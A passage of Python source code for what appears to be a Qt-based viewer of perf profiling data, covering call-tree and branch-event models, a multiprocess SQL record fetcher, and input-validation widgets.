def __init__(self, glb, params, row, comm_id, thread_id, calls_id, time, insn_cnt, cyc_cnt, branch_count, parent_item):
super(CallTreeLevelTwoPlusItemBase, self).__init__(glb, params, row, parent_item)
self.comm_id = comm_id
self.thread_id = thread_id
self.calls_id = calls_id
self.insn_cnt = insn_cnt
self.cyc_cnt = cyc_cnt
self.branch_count = branch_count
self.time = time
def Select(self):
self.query_done = True
if self.calls_id == 0:
comm_thread = " AND comm_id = " + str(self.comm_id) + " AND thread_id = " + str(self.thread_id)
else:
comm_thread = ""
if self.params.have_ipc:
ipc_str = ", insn_count, cyc_count"
else:
ipc_str = ""
query = QSqlQuery(self.glb.db)
QueryExec(query, "SELECT calls.id, name, short_name, call_time, return_time - call_time" + ipc_str + ", branch_count"
" FROM calls"
" INNER JOIN call_paths ON calls.call_path_id = call_paths.id"
" INNER JOIN symbols ON call_paths.symbol_id = symbols.id"
" INNER JOIN dsos ON symbols.dso_id = dsos.id"
" WHERE calls.parent_id = " + str(self.calls_id) + comm_thread +
" ORDER BY call_time, calls.id")
while query.next():
if self.params.have_ipc:
insn_cnt = int(query.value(5))
cyc_cnt = int(query.value(6))
branch_count = int(query.value(7))
else:
insn_cnt = 0
cyc_cnt = 0
branch_count = int(query.value(5))
child_item = CallTreeLevelThreeItem(self.glb, self.params, self.child_count, self.comm_id, self.thread_id, query.value(0), query.value(1), query.value(2), query.value(3), int(query.value(4)), insn_cnt, cyc_cnt, branch_count, self)
self.child_items.append(child_item)
self.child_count += 1
# Call tree data model level three item
class CallTreeLevelThreeItem(CallTreeLevelTwoPlusItemBase):
def __init__(self, glb, params, row, comm_id, thread_id, calls_id, name, dso, count, time, insn_cnt, cyc_cnt, branch_count, parent_item):
super(CallTreeLevelThreeItem, self).__init__(glb, params, row, comm_id, thread_id, calls_id, time, insn_cnt, cyc_cnt, branch_count, parent_item)
dso = dsoname(dso)
if self.params.have_ipc:
insn_pcnt = PercentToOneDP(insn_cnt, parent_item.insn_cnt)
cyc_pcnt = PercentToOneDP(cyc_cnt, parent_item.cyc_cnt)
br_pcnt = PercentToOneDP(branch_count, parent_item.branch_count)
ipc = CalcIPC(cyc_cnt, insn_cnt)
self.data = [ name, dso, str(count), str(time), PercentToOneDP(time, parent_item.time), str(insn_cnt), insn_pcnt, str(cyc_cnt), cyc_pcnt, ipc, str(branch_count), br_pcnt ]
else:
self.data = [ name, dso, str(count), str(time), PercentToOneDP(time, parent_item.time), str(branch_count), PercentToOneDP(branch_count, parent_item.branch_count) ]
self.dbid = calls_id
# Call tree data model level two item
class CallTreeLevelTwoItem(CallTreeLevelTwoPlusItemBase):
def __init__(self, glb, params, row, comm_id, thread_id, pid, tid, parent_item):
super(CallTreeLevelTwoItem, self).__init__(glb, params, row, comm_id, thread_id, 0, 0, 0, 0, 0, parent_item)
if self.params.have_ipc:
self.data = [str(pid) + ":" + str(tid), "", "", "", "", "", "", "", "", "", "", ""]
else:
self.data = [str(pid) + ":" + str(tid), "", "", "", "", "", ""]
self.dbid = thread_id
def Select(self):
super(CallTreeLevelTwoItem, self).Select()
for child_item in self.child_items:
self.time += child_item.time
self.insn_cnt += child_item.insn_cnt
self.cyc_cnt += child_item.cyc_cnt
self.branch_count += child_item.branch_count
for child_item in self.child_items:
child_item.data[4] = PercentToOneDP(child_item.time, self.time)
if self.params.have_ipc:
child_item.data[6] = PercentToOneDP(child_item.insn_cnt, self.insn_cnt)
child_item.data[8] = PercentToOneDP(child_item.cyc_cnt, self.cyc_cnt)
child_item.data[11] = PercentToOneDP(child_item.branch_count, self.branch_count)
else:
child_item.data[6] = PercentToOneDP(child_item.branch_count, self.branch_count)
# Call tree data model level one item
class CallTreeLevelOneItem(CallGraphLevelItemBase):
def __init__(self, glb, params, row, comm_id, comm, parent_item):
super(CallTreeLevelOneItem, self).__init__(glb, params, row, parent_item)
if self.params.have_ipc:
self.data = [comm, "", "", "", "", "", "", "", "", "", "", ""]
else:
self.data = [comm, "", "", "", "", "", ""]
self.dbid = comm_id
def Select(self):
self.query_done = True
query = QSqlQuery(self.glb.db)
QueryExec(query, "SELECT thread_id, pid, tid"
" FROM comm_threads"
" INNER JOIN threads ON thread_id = threads.id"
" WHERE comm_id = " + str(self.dbid))
while query.next():
child_item = CallTreeLevelTwoItem(self.glb, self.params, self.child_count, self.dbid, query.value(0), query.value(1), query.value(2), self)
self.child_items.append(child_item)
self.child_count += 1
# Call tree data model root item
class CallTreeRootItem(CallGraphLevelItemBase):
def __init__(self, glb, params):
super(CallTreeRootItem, self).__init__(glb, params, 0, None)
self.dbid = 0
self.query_done = True
if_has_calls = ""
if IsSelectable(glb.db, "comms", columns = "has_calls"):
if_has_calls = " WHERE has_calls = TRUE"
query = QSqlQuery(glb.db)
QueryExec(query, "SELECT id, comm FROM comms" + if_has_calls)
while query.next():
if not query.value(0):
continue
child_item = CallTreeLevelOneItem(glb, params, self.child_count, query.value(0), query.value(1), self)
self.child_items.append(child_item)
self.child_count += 1
# Call Tree data model
class CallTreeModel(CallGraphModelBase):
def __init__(self, glb, parent=None):
super(CallTreeModel, self).__init__(glb, parent)
def GetRoot(self):
return CallTreeRootItem(self.glb, self.params)
def columnCount(self, parent=None):
if self.params.have_ipc:
return 12
else:
return 7
def columnHeader(self, column):
if self.params.have_ipc:
headers = ["Call Path", "Object", "Call Time", "Time (ns) ", "Time (%) ", "Insn Cnt", "Insn Cnt (%)", "Cyc Cnt", "Cyc Cnt (%)", "IPC", "Branch Count ", "Branch Count (%) "]
else:
headers = ["Call Path", "Object", "Call Time", "Time (ns) ", "Time (%) ", "Branch Count ", "Branch Count (%) "]
return headers[column]
def columnAlignment(self, column):
if self.params.have_ipc:
alignment = [ Qt.AlignLeft, Qt.AlignLeft, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight ]
else:
alignment = [ Qt.AlignLeft, Qt.AlignLeft, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight ]
return alignment[column]
def DoFindSelect(self, query, match):
QueryExec(query, "SELECT calls.id, comm_id, thread_id"
" FROM calls"
" INNER JOIN call_paths ON calls.call_path_id = call_paths.id"
" INNER JOIN symbols ON call_paths.symbol_id = symbols.id"
" WHERE symbols.name" + match +
" ORDER BY comm_id, thread_id, call_time, calls.id")
def FindPath(self, query):
# Turn the query result into a list of ids that the tree view can walk
# to open the tree at the right place.
ids = []
parent_id = query.value(0)
while parent_id:
ids.insert(0, parent_id)
q2 = QSqlQuery(self.glb.db)
QueryExec(q2, "SELECT parent_id"
" FROM calls"
" WHERE id = " + str(parent_id))
if not q2.next():
break
parent_id = q2.value(0)
ids.insert(0, query.value(2))
ids.insert(0, query.value(1))
return ids
# Vertical widget layout
class VBox():
def __init__(self, w1, w2, w3=None):
self.vbox = QWidget()
self.vbox.setLayout(QVBoxLayout())
self.vbox.layout().setContentsMargins(0, 0, 0, 0)
self.vbox.layout().addWidget(w1)
self.vbox.layout().addWidget(w2)
if w3:
self.vbox.layout().addWidget(w3)
def Widget(self):
return self.vbox
# Tree window base
class TreeWindowBase(QMdiSubWindow):
def __init__(self, parent=None):
super(TreeWindowBase, self).__init__(parent)
self.model = None
self.find_bar = None
self.view = QTreeView()
self.view.setSelectionMode(QAbstractItemView.ContiguousSelection)
self.view.CopyCellsToClipboard = CopyTreeCellsToClipboard
self.context_menu = TreeContextMenu(self.view)
def DisplayFound(self, ids):
if not len(ids):
return False
parent = QModelIndex()
for dbid in ids:
found = False
n = self.model.rowCount(parent)
for row in xrange(n):
child = self.model.index(row, 0, parent)
if child.internalPointer().dbid == dbid:
found = True
self.view.setCurrentIndex(child)
parent = child
break
if not found:
break
return found
def Find(self, value, direction, pattern, context):
self.view.setFocus()
self.find_bar.Busy()
self.model.Find(value, direction, pattern, context, self.FindDone)
def FindDone(self, ids):
found = True
if not self.DisplayFound(ids):
found = False
self.find_bar.Idle()
if not found:
self.find_bar.NotFound()
# Context-sensitive call graph window
class CallGraphWindow(TreeWindowBase):
def __init__(self, glb, parent=None):
super(CallGraphWindow, self).__init__(parent)
self.model = LookupCreateModel("Context-Sensitive Call Graph", lambda x=glb: CallGraphModel(x))
self.view.setModel(self.model)
for c, w in ((0, 250), (1, 100), (2, 60), (3, 70), (4, 70), (5, 100)):
self.view.setColumnWidth(c, w)
self.find_bar = FindBar(self, self)
self.vbox = VBox(self.view, self.find_bar.Widget())
self.setWidget(self.vbox.Widget())
AddSubWindow(glb.mainwindow.mdi_area, self, "Context-Sensitive Call Graph")
# Call tree window
class CallTreeWindow(TreeWindowBase):
def __init__(self, glb, parent=None):
super(CallTreeWindow, self).__init__(parent)
self.model = LookupCreateModel("Call Tree", lambda x=glb: CallTreeModel(x))
self.view.setModel(self.model)
for c, w in ((0, 230), (1, 100), (2, 100), (3, 70), (4, 70), (5, 100)):
self.view.setColumnWidth(c, w)
self.find_bar = FindBar(self, self)
self.vbox = VBox(self.view, self.find_bar.Widget())
self.setWidget(self.vbox.Widget())
AddSubWindow(glb.mainwindow.mdi_area, self, "Call Tree")
# Child data item finder
class ChildDataItemFinder():
def __init__(self, root):
self.root = root
self.value, self.direction, self.pattern, self.last_value, self.last_pattern = (None,) * 5
self.rows = []
self.pos = 0
def FindSelect(self):
self.rows = []
if self.pattern:
pattern = re.compile(self.value)
for child in self.root.child_items:
for column_data in child.data:
if re.search(pattern, str(column_data)) is not None:
self.rows.append(child.row)
break
else:
for child in self.root.child_items:
for column_data in child.data:
if self.value in str(column_data):
self.rows.append(child.row)
break
def FindValue(self):
self.pos = 0
if self.last_value != self.value or self.pattern != self.last_pattern:
self.FindSelect()
if not len(self.rows):
return -1
return self.rows[self.pos]
def FindThread(self):
if self.direction == 0 or self.value != self.last_value or self.pattern != self.last_pattern:
row = self.FindValue()
elif len(self.rows):
if self.direction > 0:
self.pos += 1
if self.pos >= len(self.rows):
self.pos = 0
else:
self.pos -= 1
if self.pos < 0:
self.pos = len(self.rows) - 1
row = self.rows[self.pos]
else:
row = -1
return (True, row)
def Find(self, value, direction, pattern, context, callback):
self.value, self.direction, self.pattern, self.last_value, self.last_pattern = (value, direction,pattern, self.value, self.pattern)
# Use a thread so the UI is not blocked
thread = Thread(self.FindThread)
thread.done.connect(lambda row, t=thread, c=callback: self.FindDone(t, c, row), Qt.QueuedConnection)
thread.start()
def FindDone(self, thread, callback, row):
callback(row)
# Number of database records to fetch in one go
glb_chunk_sz = 10000
# Background process for SQL data fetcher
class SQLFetcherProcess():
def __init__(self, dbref, sql, buffer, head, tail, fetch_count, fetching_done, process_target, wait_event, fetched_event, prep):
# Need a unique connection name
conn_name = "SQLFetcher" + str(os.getpid())
self.db, dbname = dbref.Open(conn_name)
self.sql = sql
self.buffer = buffer
self.head = head
self.tail = tail
self.fetch_count = fetch_count
self.fetching_done = fetching_done
self.process_target = process_target
self.wait_event = wait_event
self.fetched_event = fetched_event
self.prep = prep
self.query = QSqlQuery(self.db)
self.query_limit = 0 if "$$last_id$$" in sql else 2
self.last_id = -1
self.fetched = 0
self.more = True
self.local_head = self.head.value
self.local_tail = self.tail.value
def Select(self):
if self.query_limit:
if self.query_limit == 1:
return
self.query_limit -= 1
stmt = self.sql.replace("$$last_id$$", str(self.last_id))
QueryExec(self.query, stmt)
def Next(self):
if not self.query.next():
self.Select()
if not self.query.next():
return None
self.last_id = self.query.value(0)
return self.prep(self.query)
def WaitForTarget(self):
while True:
self.wait_event.clear()
target = self.process_target.value
if target > self.fetched or target < 0:
break
self.wait_event.wait()
return target
def HasSpace(self, sz):
if self.local_tail <= self.local_head:
space = len(self.buffer) - self.local_head
if space > sz:
return True
if space >= glb_nsz:
# Use 0 (or space < glb_nsz) to mean there is no more at the top of the buffer
nd = pickle.dumps(0, pickle.HIGHEST_PROTOCOL)
self.buffer[self.local_head : self.local_head + len(nd)] = nd
self.local_head = 0
if self.local_tail - self.local_head > sz:
return True
return False
def WaitForSpace(self, sz):
if self.HasSpace(sz):
return
while True:
self.wait_event.clear()
self.local_tail = self.tail.value
if self.HasSpace(sz):
return
self.wait_event.wait()
def AddToBuffer(self, obj):
d = pickle.dumps(obj, pickle.HIGHEST_PROTOCOL)
n = len(d)
nd = pickle.dumps(n, pickle.HIGHEST_PROTOCOL)
sz = n + glb_nsz
self.WaitForSpace(sz)
pos = self.local_head
self.buffer[pos : pos + len(nd)] = nd
self.buffer[pos + glb_nsz : pos + sz] = d
self.local_head += sz
def FetchBatch(self, batch_size):
fetched = 0
while batch_size > fetched:
obj = self.Next()
if obj is None:
self.more = False
break
self.AddToBuffer(obj)
fetched += 1
if fetched:
self.fetched += fetched
with self.fetch_count.get_lock():
self.fetch_count.value += fetched
self.head.value = self.local_head
self.fetched_event.set()
def Run(self):
while self.more:
target = self.WaitForTarget()
if target < 0:
break
batch_size = min(glb_chunk_sz, target - self.fetched)
self.FetchBatch(batch_size)
self.fetching_done.value = True
self.fetched_event.set()
def SQLFetcherFn(*x):
process = SQLFetcherProcess(*x)
process.Run()
# SQL data fetcher
class SQLFetcher(QObject):
done = Signal(object)
def __init__(self, glb, sql, prep, process_data, parent=None):
super(SQLFetcher, self).__init__(parent)
self.process_data = process_data
self.more = True
self.target = 0
self.last_target = 0
self.fetched = 0
self.buffer_size = 16 * 1024 * 1024
self.buffer = Array(c_char, self.buffer_size, lock=False)
self.head = Value(c_longlong)
self.tail = Value(c_longlong)
self.local_tail = 0
self.fetch_count = Value(c_longlong)
self.fetching_done = Value(c_bool)
self.last_count = 0
self.process_target = Value(c_longlong)
self.wait_event = Event()
self.fetched_event = Event()
glb.AddInstanceToShutdownOnExit(self)
self.process = Process(target=SQLFetcherFn, args=(glb.dbref, sql, self.buffer, self.head, self.tail, self.fetch_count, self.fetching_done, self.process_target, self.wait_event, self.fetched_event, prep))
self.process.start()
self.thread = Thread(self.Thread)
self.thread.done.connect(self.ProcessData, Qt.QueuedConnection)
self.thread.start()
def Shutdown(self):
# Tell the thread and process to exit
self.process_target.value = -1
self.wait_event.set()
self.more = False
self.fetching_done.value = True
self.fetched_event.set()
def Thread(self):
if not self.more:
return True, 0
while True:
self.fetched_event.clear()
fetch_count = self.fetch_count.value
if fetch_count != self.last_count:
break
if self.fetching_done.value:
self.more = False
return True, 0
self.fetched_event.wait()
count = fetch_count - self.last_count
self.last_count = fetch_count
self.fetched += count
return False, count
def Fetch(self, nr):
if not self.more:
# -1 inidcates there are no more
return -1
result = self.fetched
extra = result + nr - self.target
if extra > 0:
self.target += extra
# process_target < 0 indicates shutting down
if self.process_target.value >= 0:
self.process_target.value = self.target
self.wait_event.set()
return result
def RemoveFromBuffer(self):
pos = self.local_tail
if len(self.buffer) - pos < glb_nsz:
pos = 0
n = pickle.loads(self.buffer[pos : pos + glb_nsz])
if n == 0:
pos = 0
n = pickle.loads(self.buffer[0 : glb_nsz])
pos += glb_nsz
obj = pickle.loads(self.buffer[pos : pos + n])
self.local_tail = pos + n
return obj
def ProcessData(self, count):
for i in xrange(count):
obj = self.RemoveFromBuffer()
self.process_data(obj)
self.tail.value = self.local_tail
self.wait_event.set()
self.done.emit(count)
# Fetch more records bar
class FetchMoreRecordsBar():
def __init__(self, model, parent):
self.model = model
self.label = QLabel("Number of records (x " + "{:,}".format(glb_chunk_sz) + ") to fetch:")
self.label.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
self.fetch_count = QSpinBox()
self.fetch_count.setRange(1, 1000000)
self.fetch_count.setValue(10)
self.fetch_count.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
self.fetch = QPushButton("Go!")
self.fetch.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
self.fetch.released.connect(self.FetchMoreRecords)
self.progress = QProgressBar()
self.progress.setRange(0, 100)
self.progress.hide()
self.done_label = QLabel("All records fetched")
self.done_label.hide()
self.spacer = QLabel("")
self.close_button = QToolButton()
self.close_button.setIcon(parent.style().standardIcon(QStyle.SP_DockWidgetCloseButton))
self.close_button.released.connect(self.Deactivate)
self.hbox = QHBoxLayout()
self.hbox.setContentsMargins(0, 0, 0, 0)
self.hbox.addWidget(self.label)
self.hbox.addWidget(self.fetch_count)
self.hbox.addWidget(self.fetch)
self.hbox.addWidget(self.spacer)
self.hbox.addWidget(self.progress)
self.hbox.addWidget(self.done_label)
self.hbox.addWidget(self.close_button)
self.bar = QWidget()
self.bar.setLayout(self.hbox)
self.bar.show()
self.in_progress = False
self.model.progress.connect(self.Progress)
self.done = False
if not model.HasMoreRecords():
self.Done()
def Widget(self):
return self.bar
def Activate(self):
self.bar.show()
self.fetch.setFocus()
def Deactivate(self):
self.bar.hide()
def Enable(self, enable):
self.fetch.setEnabled(enable)
self.fetch_count.setEnabled(enable)
def Busy(self):
self.Enable(False)
self.fetch.hide()
self.spacer.hide()
self.progress.show()
def Idle(self):
self.in_progress = False
self.Enable(True)
self.progress.hide()
self.fetch.show()
self.spacer.show()
def Target(self):
return self.fetch_count.value() * glb_chunk_sz
def Done(self):
self.done = True
self.Idle()
self.label.hide()
self.fetch_count.hide()
self.fetch.hide()
self.spacer.hide()
self.done_label.show()
def Progress(self, count):
if self.in_progress:
if count:
percent = ((count - self.start) * 100) / self.Target()
if percent >= 100:
self.Idle()
else:
self.progress.setValue(percent)
if not count:
# Count value of zero means no more records
self.Done()
def FetchMoreRecords(self):
if self.done:
return
self.progress.setValue(0)
self.Busy()
self.in_progress = True
self.start = self.model.FetchMoreRecords(self.Target())
# Brance data model level two item
class BranchLevelTwoItem():
def __init__(self, row, col, text, parent_item):
self.row = row
self.parent_item = parent_item
self.data = [""] * (col + 1)
self.data[col] = text
self.level = 2
def getParentItem(self):
return self.parent_item
def getRow(self):
return self.row
def childCount(self):
return 0
def hasChildren(self):
return False
def getData(self, column):
return self.data[column]
# Brance data model level one item
class BranchLevelOneItem():
def __init__(self, glb, row, data, parent_item):
self.glb = glb
self.row = row
self.parent_item = parent_item
self.child_count = 0
self.child_items = []
self.data = data[1:]
self.dbid = data[0]
self.level = 1
self.query_done = False
self.br_col = len(self.data) - 1
def getChildItem(self, row):
return self.child_items[row]
def getParentItem(self):
return self.parent_item
def getRow(self):
return self.row
def Select(self):
self.query_done = True
if not self.glb.have_disassembler:
return
query = QSqlQuery(self.glb.db)
QueryExec(query, "SELECT cpu, to_dso_id, to_symbol_id, to_sym_offset, short_name, long_name, build_id, sym_start, to_ip"
" FROM samples"
" INNER JOIN dsos ON samples.to_dso_id = dsos.id"
" INNER JOIN symbols ON samples.to_symbol_id = symbols.id"
" WHERE samples.id = " + str(self.dbid))
if not query.next():
return
cpu = query.value(0)
dso = query.value(1)
sym = query.value(2)
if dso == 0 or sym == 0:
return
off = query.value(3)
short_name = query.value(4)
long_name = query.value(5)
build_id = query.value(6)
sym_start = query.value(7)
ip = query.value(8)
QueryExec(query, "SELECT samples.dso_id, symbol_id, sym_offset, sym_start"
" FROM samples"
" INNER JOIN symbols ON samples.symbol_id = symbols.id"
" WHERE samples.id > " + str(self.dbid) + " AND cpu = " + str(cpu) +
" ORDER BY samples.id"
" LIMIT 1")
if not query.next():
return
if query.value(0) != dso:
# Cannot disassemble from one dso to another
return
bsym = query.value(1)
boff = query.value(2)
bsym_start = query.value(3)
if bsym == 0:
return
tot = bsym_start + boff + 1 - sym_start - off
if tot <= 0 or tot > 16384:
return
inst = self.glb.disassembler.Instruction()
f = self.glb.FileFromNamesAndBuildId(short_name, long_name, build_id)
if not f:
return
mode = 0 if Is64Bit(f) else 1
self.glb.disassembler.SetMode(inst, mode)
buf_sz = tot + 16
buf = create_string_buffer(tot + 16)
f.seek(sym_start + off)
buf.value = f.read(buf_sz)
buf_ptr = addressof(buf)
i = 0
while tot > 0:
cnt, text = self.glb.disassembler.DisassembleOne(inst, buf_ptr, buf_sz, ip)
if cnt:
byte_str = tohex(ip).rjust(16)
for k in xrange(cnt):
byte_str += " %02x" % ord(buf[i])
i += 1
while k < 15:
byte_str += " "
k += 1
self.child_items.append(BranchLevelTwoItem(0, self.br_col, byte_str + " " + text, self))
self.child_count += 1
else:
return
buf_ptr += cnt
tot -= cnt
buf_sz -= cnt
ip += cnt
def childCount(self):
if not self.query_done:
self.Select()
if not self.child_count:
return -1
return self.child_count
def hasChildren(self):
if not self.query_done:
return True
return self.child_count > 0
def getData(self, column):
return self.data[column]
# Brance data model root item
class BranchRootItem():
def __init__(self):
self.child_count = 0
self.child_items = []
self.level = 0
def getChildItem(self, row):
return self.child_items[row]
def getParentItem(self):
return None
def getRow(self):
return 0
def childCount(self):
return self.child_count
def hasChildren(self):
return self.child_count > 0
def getData(self, column):
return ""
# Calculate instructions per cycle
def CalcIPC(cyc_cnt, insn_cnt):
if cyc_cnt and insn_cnt:
ipc = Decimal(float(insn_cnt) / cyc_cnt)
ipc = str(ipc.quantize(Decimal(".01"), rounding=ROUND_HALF_UP))
else:
ipc = "0"
return ipc
# Branch data preparation
def BranchDataPrepBr(query, data):
data.append(tohex(query.value(8)).rjust(16) + " " + query.value(9) + offstr(query.value(10)) +
" (" + dsoname(query.value(11)) + ")" + " -> " +
tohex(query.value(12)) + " " + query.value(13) + offstr(query.value(14)) +
" (" + dsoname(query.value(15)) + ")")
def BranchDataPrepIPC(query, data):
insn_cnt = query.value(16)
cyc_cnt = query.value(17)
ipc = CalcIPC(cyc_cnt, insn_cnt)
data.append(insn_cnt)
data.append(cyc_cnt)
data.append(ipc)
def BranchDataPrep(query):
data = []
for i in xrange(0, 8):
data.append(query.value(i))
BranchDataPrepBr(query, data)
return data
def BranchDataPrepWA(query):
data = []
data.append(query.value(0))
# Workaround pyside failing to handle large integers (i.e. time) in python3 by converting to a string
data.append("{:>19}".format(query.value(1)))
for i in xrange(2, 8):
data.append(query.value(i))
BranchDataPrepBr(query, data)
return data
def BranchDataWithIPCPrep(query):
data = []
for i in xrange(0, 8):
data.append(query.value(i))
BranchDataPrepIPC(query, data)
BranchDataPrepBr(query, data)
return data
def BranchDataWithIPCPrepWA(query):
data = []
data.append(query.value(0))
# Workaround pyside failing to handle large integers (i.e. time) in python3 by converting to a string
data.append("{:>19}".format(query.value(1)))
for i in xrange(2, 8):
data.append(query.value(i))
BranchDataPrepIPC(query, data)
BranchDataPrepBr(query, data)
return data
# Branch data model
class BranchModel(TreeModel):
progress = Signal(object)
def __init__(self, glb, event_id, where_clause, parent=None):
super(BranchModel, self).__init__(glb, None, parent)
self.event_id = event_id
self.more = True
self.populated = 0
self.have_ipc = IsSelectable(glb.db, "samples", columns = "insn_count, cyc_count")
if self.have_ipc:
select_ipc = ", insn_count, cyc_count"
prep_fn = BranchDataWithIPCPrep
prep_wa_fn = BranchDataWithIPCPrepWA
else:
select_ipc = ""
prep_fn = BranchDataPrep
prep_wa_fn = BranchDataPrepWA
sql = ("SELECT samples.id, time, cpu, comm, pid, tid, branch_types.name,"
" CASE WHEN in_tx = '0' THEN 'No' ELSE 'Yes' END,"
" ip, symbols.name, sym_offset, dsos.short_name,"
" to_ip, to_symbols.name, to_sym_offset, to_dsos.short_name"
+ select_ipc +
" FROM samples"
" INNER JOIN comms ON comm_id = comms.id"
" INNER JOIN threads ON thread_id = threads.id"
" INNER JOIN branch_types ON branch_type = branch_types.id"
" INNER JOIN symbols ON symbol_id = symbols.id"
" INNER JOIN symbols to_symbols ON to_symbol_id = to_symbols.id"
" INNER JOIN dsos ON samples.dso_id = dsos.id"
" INNER JOIN dsos AS to_dsos ON samples.to_dso_id = to_dsos.id"
" WHERE samples.id > $$last_id$$" + where_clause +
" AND evsel_id = " + str(self.event_id) +
" ORDER BY samples.id"
" LIMIT " + str(glb_chunk_sz))
if pyside_version_1 and sys.version_info[0] == 3:
prep = prep_fn
else:
prep = prep_wa_fn
self.fetcher = SQLFetcher(glb, sql, prep, self.AddSample)
self.fetcher.done.connect(self.Update)
self.fetcher.Fetch(glb_chunk_sz)
def GetRoot(self):
return BranchRootItem()
def columnCount(self, parent=None):
if self.have_ipc:
return 11
else:
return 8
def columnHeader(self, column):
if self.have_ipc:
return ("Time", "CPU", "Command", "PID", "TID", "Branch Type", "In Tx", "Insn Cnt", "Cyc Cnt", "IPC", "Branch")[column]
else:
return ("Time", "CPU", "Command", "PID", "TID", "Branch Type", "In Tx", "Branch")[column]
def columnFont(self, column):
if self.have_ipc:
br_col = 10
else:
br_col = 7
if column != br_col:
return None
return QFont("Monospace")
def DisplayData(self, item, index):
if item.level == 1:
self.FetchIfNeeded(item.row)
return item.getData(index.column())
def AddSample(self, data):
child = BranchLevelOneItem(self.glb, self.populated, data, self.root)
self.root.child_items.append(child)
self.populated += 1
def Update(self, fetched):
if not fetched:
self.more = False
self.progress.emit(0)
child_count = self.root.child_count
count = self.populated - child_count
if count > 0:
parent = QModelIndex()
self.beginInsertRows(parent, child_count, child_count + count - 1)
self.insertRows(child_count, count, parent)
self.root.child_count += count
self.endInsertRows()
self.progress.emit(self.root.child_count)
def FetchMoreRecords(self, count):
current = self.root.child_count
if self.more:
self.fetcher.Fetch(count)
else:
self.progress.emit(0)
return current
def HasMoreRecords(self):
return self.more
# Report Variables
class ReportVars():
def __init__(self, name = "", where_clause = "", limit = ""):
self.name = name
self.where_clause = where_clause
self.limit = limit
def UniqueId(self):
return str(self.where_clause + ";" + self.limit)
# Branch window
class BranchWindow(QMdiSubWindow):
def __init__(self, glb, event_id, report_vars, parent=None):
super(BranchWindow, self).__init__(parent)
model_name = "Branch Events " + str(event_id) + " " + report_vars.UniqueId()
self.model = LookupCreateModel(model_name, lambda: BranchModel(glb, event_id, report_vars.where_clause))
self.view = QTreeView()
self.view.setUniformRowHeights(True)
self.view.setSelectionMode(QAbstractItemView.ContiguousSelection)
self.view.CopyCellsToClipboard = CopyTreeCellsToClipboard
self.view.setModel(self.model)
self.ResizeColumnsToContents()
self.context_menu = TreeContextMenu(self.view)
self.find_bar = FindBar(self, self, True)
self.finder = ChildDataItemFinder(self.model.root)
self.fetch_bar = FetchMoreRecordsBar(self.model, self)
self.vbox = VBox(self.view, self.find_bar.Widget(), self.fetch_bar.Widget())
self.setWidget(self.vbox.Widget())
AddSubWindow(glb.mainwindow.mdi_area, self, report_vars.name + " Branch Events")
def ResizeColumnToContents(self, column, n):
# Using the view's resizeColumnToContents() here is extrememly slow
# so implement a crude alternative
mm = "MM" if column else "MMMM"
font = self.view.font()
metrics = QFontMetrics(font)
max = 0
for row in xrange(n):
val = self.model.root.child_items[row].data[column]
len = metrics.width(str(val) + mm)
max = len if len > max else max
val = self.model.columnHeader(column)
len = metrics.width(str(val) + mm)
max = len if len > max else max
self.view.setColumnWidth(column, max)
def ResizeColumnsToContents(self):
n = min(self.model.root.child_count, 100)
if n < 1:
# No data yet, so connect a signal to notify when there is
self.model.rowsInserted.connect(self.UpdateColumnWidths)
return
columns = self.model.columnCount()
for i in xrange(columns):
self.ResizeColumnToContents(i, n)
def UpdateColumnWidths(self, *x):
# This only needs to be done once, so disconnect the signal now
self.model.rowsInserted.disconnect(self.UpdateColumnWidths)
self.ResizeColumnsToContents()
def Find(self, value, direction, pattern, context):
self.view.setFocus()
self.find_bar.Busy()
self.finder.Find(value, direction, pattern, context, self.FindDone)
def FindDone(self, row):
self.find_bar.Idle()
if row >= 0:
self.view.setCurrentIndex(self.model.index(row, 0, QModelIndex()))
else:
self.find_bar.NotFound()
# Line edit data item
class LineEditDataItem(object):
def __init__(self, glb, label, placeholder_text, parent, id = "", default = ""):
self.glb = glb
self.label = label
self.placeholder_text = placeholder_text
self.parent = parent
self.id = id
self.value = default
self.widget = QLineEdit(default)
self.widget.editingFinished.connect(self.Validate)
self.widget.textChanged.connect(self.Invalidate)
self.red = False
self.error = ""
self.validated = True
if placeholder_text:
self.widget.setPlaceholderText(placeholder_text)
def TurnTextRed(self):
if not self.red:
palette = QPalette()
palette.setColor(QPalette.Text,Qt.red)
self.widget.setPalette(palette)
self.red = True
def TurnTextNormal(self):
if self.red:
palette = QPalette()
self.widget.setPalette(palette)
self.red = False
def InvalidValue(self, value):
self.value = ""
self.TurnTextRed()
self.error = self.label + " invalid value '" + value + "'"
self.parent.ShowMessage(self.error)
def Invalidate(self):
self.validated = False
def DoValidate(self, input_string):
self.value = input_string.strip()
def Validate(self):
self.validated = True
self.error = ""
self.TurnTextNormal()
self.parent.ClearMessage()
input_string = self.widget.text()
if not len(input_string.strip()):
self.value = ""
return
self.DoValidate(input_string)
def IsValid(self):
if not self.validated:
self.Validate()
if len(self.error):
self.parent.ShowMessage(self.error)
return False
return True
def IsNumber(self, value):
try:
x = int(value)
except:
x = 0
return str(x) == value
# Non-negative integer ranges dialog data item
class NonNegativeIntegerRangesDataItem(LineEditDataItem):
def __init__(self, glb, label, placeholder_text, column_name, parent):
super(NonNegativeIntegerRangesDataItem, self).__init__(glb, label, placeholder_text, parent)
self.column_name = column_name
def DoValidate(self, input_string):
singles = []
ranges = []
for value in [x.strip() for x in input_string.split(",")]:
if "-" in value:
vrange = value.split("-")
if len(vrange) != 2 or not self.IsNumber(vrange[0]) or not self.IsNumber(vrange[1]):
return self.InvalidValue(value)
ranges.append(vrange)
else:
if not self.IsNumber(value):
return self.InvalidValue(value)
singles.append(value)
ranges = [("(" + self.column_name + " >= " + r[0] + " AND " + self.column_name + " <= " + r[1] + ")") for r in ranges]
if len(singles):
ranges.append(self.column_name + " IN (" + ",".join(singles) + ")")
self.value = " OR ".join(ranges)
# Positive integer dialog data item
class PositiveIntegerDataItem(LineEditDataItem):
def __init__(self, glb, label, placeholder_text, parent, id = "", default = ""):
super(PositiveIntegerDataItem, self).__init__(glb, label, placeholder_text, parent, id, default)
def DoValidate(self, input_string):
